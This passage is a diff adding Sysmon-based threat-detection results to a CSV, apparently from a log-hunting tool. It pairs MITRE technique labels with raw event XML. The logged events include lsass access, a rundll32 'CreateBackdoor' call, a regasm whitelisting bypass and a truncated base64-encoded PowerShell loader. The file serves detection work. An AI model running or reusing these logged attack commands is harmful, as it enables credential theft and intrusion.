+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:14.781</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Credential Vault Client Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
+    </TimeCreated>
+    <EventRecordID>17286</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""276"" ThreadID=""1000"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-13 18:03:19.482</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-0010EE150C00</Data>
+    <Data Name=""ProcessId"">2372</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">/c notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-0020DE330100</Data>
+    <Data Name=""LogonId"">0x133de</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
+    <Data Name=""ParentProcessId"">944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
+    </TimeCreated>
+    <EventRecordID>243547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
+    <Data Name=""ProcessId"">6400</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:14.871968Z"">
+    </TimeCreated>
+    <EventRecordID>23</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:14.781</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Credential Vault Client Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
+    </TimeCreated>
+    <EventRecordID>243547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
+    <Data Name=""ProcessId"">6400</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
+    </TimeCreated>
+    <EventRecordID>243547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
+    <Data Name=""ProcessId"">6400</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>8</EventID>
+    <Version>2</Version>
+    <Level>4</Level>
+    <Task>8</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T12:43:43.784179Z"">
+    </TimeCreated>
+    <EventRecordID>9060</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""316"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 12:43:43.784</Data>
+    <Data Name=""SourceProcessGuid"">365ABB72-4055-5CC8-0000-0010769D0B00</Data>
+    <Data Name=""SourceProcessId"">1532</Data>
+    <Data Name=""SourceImage"">\\VBOXSVR\HTools\voice_mail.msg.exe</Data>
+    <Data Name=""TargetProcessGuid"">365ABB72-3FE0-5CC8-0000-00107E590000</Data>
+    <Data Name=""TargetProcessId"">492</Data>
+    <Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""NewThreadId"">1744</Data>
+    <Data Name=""StartAddress"">0x001A0000</Data>
+    <Data Name=""StartModule""></Data>
+    <Data Name=""StartFunction""></Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:34.411034Z"">
+    </TimeCreated>
+    <EventRecordID>4923</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:34.234</Data>
+    <Data Name=""ProcessGuid"">747F3D96-662E-5D3F-0000-0010C2048900</Data>
+    <Data Name=""ProcessId"">1976</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net  start CDPSvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T12:35:55.876452Z"">
+    </TimeCreated>
+    <EventRecordID>244336</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2844"" ThreadID=""3648"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 12:35:55.872</Data>
+    <Data Name=""ProcessGuid"">747F3D96-0A2B-5E76-0000-0010C02A3D00</Data>
+    <Data Name=""ProcessId"">7072</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">net.exe</Data>
+    <Data Name=""CommandLine"">net  start CDPSvc</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-06A4-5E76-0000-002043DE0200</Data>
+    <Data Name=""LogonId"">0x2de43</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-077C-5E76-0000-0010A5BA2300</Data>
+    <Data Name=""ParentProcessId"">5068</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\InetSRV\appcmd.exe&quot;  list vdir /text:physicalpath ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.000311Z"">
+    </TimeCreated>
+    <EventRecordID>5877</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:16.960</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6C-5CEB-0000-00107257FF00</Data>
+    <Data Name=""ProcessId"">3484</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\InetSRV\appcmd.exe&quot;  list vdir /text:physicalpath</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEA